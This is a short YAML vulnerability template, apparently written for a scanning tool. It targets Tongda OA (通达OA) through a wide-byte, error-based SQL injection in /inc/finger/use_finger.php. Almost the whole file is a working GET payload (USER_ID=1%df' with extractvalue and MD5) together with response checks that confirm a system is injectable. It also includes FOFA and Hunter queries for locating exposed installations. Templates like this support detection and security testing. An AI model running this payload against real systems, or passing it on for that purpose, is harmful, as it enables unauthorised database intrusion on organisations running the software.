product: 通达OA
vName: 通达OA use_finger.php SQL注入_宽字节报错
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA SQL注入_宽字节报错(/inc/finger/use_finger.php)
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /inc/finger/use_finger.php?USER_ID=1%df'and extractvalue(1,concat(0x5c,MD5(123456))) -- -
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - XPATH syntax error
              - e10adc3949ba59abbe56e057f20f883e
            logic: and